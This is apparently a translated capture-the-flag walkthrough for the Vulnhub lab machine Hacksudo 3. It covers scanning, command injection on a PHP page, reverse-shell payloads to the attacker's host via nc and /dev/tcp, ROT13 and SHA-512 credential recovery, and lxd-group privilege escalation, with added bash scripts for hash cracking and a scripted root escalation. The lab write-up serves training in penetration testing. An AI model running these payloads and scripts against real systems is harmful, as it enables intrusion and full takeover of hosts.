Hacksudo 3
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:96:d2:34 1 60 PCS Systemtechnik GmbH
192.168.56.213 08:00:27:2c:a1:11 1 60 PCS Systemtechnik GmbH
netdiscover, which ships with Kali Linux, identifies the target host's IP address as 192.168.56.213.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.213 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-23 04:33 EST
Nmap scan report for localhost (192.168.56.213)
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp filtered ftp
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Link Lock - Password-protect links
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:2C:A1:11 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.46 seconds
The Nmap scan shows a single open port, 80 (Apache httpd 2.4.46). The other two ports (21, 22) are reported as filtered, meaning the probes were dropped rather than answered, so neither FTP nor SSH is reachable from here.
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ curl http://192.168.56.213/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.46 (Ubuntu) Server at 192.168.56.213 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ nikto -h http://192.168.56.213
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.213
+ Target Hostname: 192.168.56.213
+ Target Port: 80
+ Start Time: 2022-11-23 04:38:02 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 8de, size: 5bddff0c01c87, mtime: gzip
+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
+ OSVDB-3092: /hidden/: This might be interesting...
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ /login.php: Admin login page/section found.
+ 7916 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2022-11-23 04:38:51 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.46) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
Nikto reports a /hidden/ directory and a /login.php file, though on first inspection /hidden/ is of no use.
/generator.php turns out to have a command-execution vulnerability, so the next step is to obtain a reverse shell, for example by chaining a command onto the expected input:
jason&&nc -e /bin/bash 192.168.56.206 5555
No connection came back. Something may be filtering the payload, or the target's nc may simply be the netcat-openbsd build that ships with Ubuntu, which has no -e option. Try another method.
This one finally worked:
bash -c "bash -i >& /dev/tcp/192.168.56.206/5555 0>&1"
The shell from the target arrives on the Kali listener:
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.213] 55358
bash: cannot set terminal process group (744): Inappropriate ioctl for device
bash: no job control in this shell
www-data@hacksudo:/var/www/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@hacksudo:/var/www/html$ which python
which python
www-data@hacksudo:/var/www/html$ which python3
which python3
/usr/bin/python3
www-data@hacksudo:/var/www/html$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<tml$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacksudo:/var/www/html$
This rather odd file turned up in /var/www:
www-data@hacksudo:/var/www$ cat hacksudo
cat hacksudo
unpxfhqb ybpxre FFU hfreanzr:unpxfhqb cnffjbeq:63p9142792q571q0s7p28ro30626q6s38792n2r7679o76q784231676q62447so80ns8953745s709p6622qqn2po4q754p262q0q31o3030n08s7o524079n6o336o
www-data@hacksudo:/var/www$ ./hacksudo
./hacksudo
./hacksudo: line 1: unpxfhqb: command not found
www-data@hacksudo:/var/www$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 www-data www-data 4.0K Mar 20 2021 .
drwxr-xr-x 14 root root 4.0K Mar 19 2021 ..
-rwxrwxr-- 1 www-data www-data 176 Mar 20 2021 hacksudo
drwxr-xr-x 6 www-data www-data 4.0K Mar 24 2021 html
www-data@hacksudo:/var/www$ ./hacksudo
./hacksudo
./hacksudo: line 1: unpxfhqb: command not found
www-data@hacksudo:/var/www$ file hacksudo
file hacksudo
hacksudo: ASCII text
www-data@hacksudo:/var/www$
This looks like an encoding rather than real encryption: a Caesar shift, specifically ROT13. The giveaway is the password field, where the hex digits a-f have become n-s while the numerals 0-9 are untouched. Decoded:
hacksudo locker SSH username:hacksudo password:63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b
The password is not plaintext but a hash: 128 hex characters, i.e. a 512-bit digest.
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# [email protected] #
#########################################################################
--------------------------------------------------
HASH: 63c9142792d571d0f7c28eb30626d6f38792a2e7679b76d784231676d62447fb80af8953745f709c6622dda2cb4d754c262d0d31b3030a08f7b524079a6b336b
Possible Hashs:
[+] SHA-512
[+] Whirlpool
Look it up on an online SHA-512 site:
https://10015.io/tools/sha512-encrypt-decrypt
SHA-512 cannot be decrypted; the site simply compares the digest against precomputed hashes of common words. The word it returns is: vishal. Logging in as hacksudo with that password:
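As an added example, not part of the original write-up, the same two steps in shell: ROT13-decode the note found in /var/www/hacksudo and recover the SHA-512 password by hashing candidates from a wordlist, which is all an online "decrypt" site can do for a one-way digest. The note text is copied from the cat output above; the four-word wordlist is constructed for the demonstration.

```bash
#!/usr/bin/env bash
# Added example, not part of the original write-up: decode the ROT13 note
# from /var/www/hacksudo and recover the SHA-512 password by wordlist lookup.
set -eu

# Constructed copy of the note shown in the write-up's `cat hacksudo` output.
NOTE='unpxfhqb ybpxre FFU hfreanzr:unpxfhqb cnffjbeq:63p9142792q571q0s7p28ro30626q6s38792n2r7679o76q784231676q62447so80ns8953745s709p6622qqn2po4q754p262q0q31o3030n08s7o524079n6o336o'

# ROT13 is a Caesar shift of 13 over letters only; digits and punctuation
# pass through, which is why the hex digest kept 0-9 intact but a-f became n-s.
rot13() {
    printf '%s' "$1" | tr 'A-Za-z' 'N-ZA-Mn-za-m'
}

# Pull the value after "password:" out of the decoded note.
password_field() {
    printf '%s' "$1" | sed -n 's/.*password:\([0-9a-fA-F]*\).*/\1/p'
}

# Length of a hex digest in bits; 0 if the string is not hex.
# 512 bits fits SHA-512 and Whirlpool alike, so length alone cannot decide
# between them (hash-identifier listed both for the same reason).
digest_bits() {
    case "$1" in
        '' | *[!0-9a-fA-F]*) echo 0; return ;;
    esac
    echo $(( ${#1} * 4 ))
}

# Hex SHA-512 of a string (no trailing newline, as most web apps hash it).
sha512_hex() {
    if command -v sha512sum >/dev/null 2>&1; then
        printf '%s' "$1" | sha512sum | cut -d' ' -f1
    else
        printf '%s' "$1" | openssl dgst -sha512 | awk '{print $NF}'
    fi
}

# SHA-512 is one-way, so "decrypting" means hashing candidates until one
# matches. $1 = target digest; candidates arrive one per line on stdin.
# Prints the matching word and returns 0, or returns 1 if none match.
crack_sha512() {
    local target w
    target="$(printf '%s' "$1" | tr 'A-F' 'a-f')"
    while IFS= read -r w; do
        if [ "$(sha512_hex "$w")" = "$target" ]; then
            printf '%s\n' "$w"
            return 0
        fi
    done
    return 1
}

demo() {
    local decoded digest
    decoded="$(rot13 "$NOTE")"
    echo "decoded: $decoded"
    digest="$(password_field "$decoded")"
    echo "digest: $(digest_bits "$digest")-bit"
    # Constructed mini wordlist; for a real run use
    #   crack_sha512 "$digest" < /usr/share/wordlists/rockyou.txt
    printf '%s\n' password admin hacksudo vishal | crack_sha512 "$digest" \
        || echo "no match in wordlist"
}

demo
```

Spawning one sha512sum per candidate is fine for a handful of words but far too slow for a full wordlist; for that, hand the digest to hashcat in raw SHA-512 mode (-m 1700) or john with --format=Raw-SHA512.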
hacksudo@hacksudo:~$ id
id
uid=1000(hacksudo) gid=1000(hacksudo) groups=1000(hacksudo),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
hacksudo@hacksudo:~$ ls
ls
chat locker storage user.txt view work
hacksudo@hacksudo:~$ cat user.txt
cat user.txt
d045e6f9feb79e94442213f9d008ac48
hacksudo@hacksudo:~$
Privilege escalation
Since hacksudo is a member of the lxd group, the next step is to escalate via lxd: any member of that group can talk to the LXD daemon, create a privileged container and mount the host's filesystem into it, which is effectively root on the host.
Clone the repository containing the prebuilt Alpine image to Kali with git, then serve the tarball over HTTP so the target can fetch it (the wget below pulls it from port 8000 on the Kali box):
┌──(kali㉿kali)-[~/Vulnhub/Hacksudo3]
└─$ git clone https://github.com/saghul/lxd-alpine-builder.git
Cloning into 'lxd-alpine-builder'...
remote: Enumerating objects: 50, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 50 (delta 2), reused 5 (delta 2), pack-reused 42
Receiving objects: 100% (50/50), 3.11 MiB | 3.21 MiB/s, done.
Resolving deltas: 100% (15/15), done.
hacksudo@hacksudo:~$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
<6.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2022-11-23 10:53:05-- http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’
alpine-v3.13-x86_64 100%[===================>] 3.11M --.-KB/s in 0.01s
2022-11-23 10:53:05 (308 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]
hacksudo@hacksudo:~$ ls
ls
alpine-v3.13-x86_64-20210218_0139.tar.gz locker storage view
chat snap user.txt work
hacksudo@hacksudo:~$
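As an added example, not the write-up's own commands (it stops at the download), here is the standard lxd-group escalation the Alpine tarball is for, wrapped in a script. It assumes the lxc client is installed on the target and the tarball sits in the current directory; the image alias privesc, container name ignite and mount point /mnt/root are arbitrary choices of this example. The in_lxd_group check is the precondition that the hacksudo user's id output above satisfies.

```bash
#!/usr/bin/env bash
# Added example, not from the original write-up: lxd-group privilege
# escalation using the Alpine image tarball fetched above. Assumes `lxc`
# is installed on the target; names (privesc, ignite, /mnt/root) are arbitrary.
set -eu

# Precondition: a supplementary group named lxd in the `id` output.
in_lxd_group() {
    case "$1" in
        *groups=*"(lxd)"*) return 0 ;;
        *) return 1 ;;
    esac
}

# The escalation as a reviewable command list. $1 = image tarball, $2 = container name.
# A privileged container shares uid 0 with the host, and adding / as a disk
# device hands that root the whole host filesystem at /mnt/root.
# The first line initialises LXD with defaults only if no storage pool exists yet.
lxd_escalation_plan() {
    local image="$1" name="$2"
    cat <<EOF
lxc list >/dev/null 2>&1 || lxd init --auto
lxc image import "$image" --alias privesc
lxc init privesc "$name" -c security.privileged=true
lxc config device add "$name" hostroot disk source=/ path=/mnt/root recursive=true
lxc start "$name"
lxc exec "$name" -- /bin/sh
EOF
}

# Run the plan in the current shell so `lxc exec` keeps the terminal as stdin.
lxd_root_shell() {
    in_lxd_group "$(id)" || { echo "current user is not in the lxd group" >&2; return 1; }
    eval "$(lxd_escalation_plan "$1" "$2")"
}

# Constructed copy of the hacksudo user's `id` line from the session above.
SAMPLE_ID='uid=1000(hacksudo) gid=1000(hacksudo) groups=1000(hacksudo),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)'

if [ "$#" -ge 1 ]; then
    # usage: ./lxd_privesc.sh alpine-v3.13-x86_64-20210218_0139.tar.gz
    lxd_root_shell "$1" ignite
else
    # Dry run: show the precondition check and the commands that would execute.
    in_lxd_group "$SAMPLE_ID" && echo "sample id line: lxd member, escalation possible"
    lxd_escalation_plan alpine-v3.13-x86_64-20210218_0139.tar.gz ignite
fi
```

Inside the container shell the host filesystem, including /mnt/root/root and /mnt/root/etc, is readable and writable, and anything changed there persists on the host. Without an argument the script only prints the plan, which is a useful habit: eval on a generated command list is easy to read before it is run.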
From: https://www.cnblogs.com/jason-huawen/p/16919501.html